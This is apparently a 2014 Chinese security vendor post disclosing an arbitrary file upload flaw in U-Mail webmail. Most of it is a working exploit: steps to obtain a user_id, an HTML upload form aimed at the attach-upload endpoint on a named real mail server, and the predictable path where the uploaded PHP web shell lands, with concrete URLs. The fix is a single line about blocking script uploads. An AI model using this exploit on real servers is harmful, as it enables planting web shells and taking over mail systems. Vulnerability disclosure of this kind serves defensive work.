U-Mail任意文件上传漏洞一枚及修复


		关于冰盾 \| 使用条款 \| 网站地图

U-Mail任意文件上传漏洞一枚及修复

U-Mail任意文件上传漏洞一枚及修复

作者：冰盾防火墙　网站：www.bingdun.com　日期：2014-12-15

先登录官方测试站点：

这里登录的账号为：mailtest3721

再获取当前登录用户的user_id

http://mail.comingchina.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=mailtest3721

这里mailtest3721对应的user_id为:78609

html exp:

1

2

3

4

5

6

7

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 
<FORM name=form1 method=post action="http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data>
 
上传文件：<input type="file" name="Filedata" size="30">
 
<INPUT type=submit value=上传 name=Submit>

上传后获取"file_id":"13995534500"

shell地址：

http://mail.comingchina.com/webmail/client/cache/｛user_id｝/｛file_id｝.php

这里是：

http://mail.comingchina.com/webmail/client/cache/78609/13995534500.php

修复方案：

禁止上传php等脚本文件。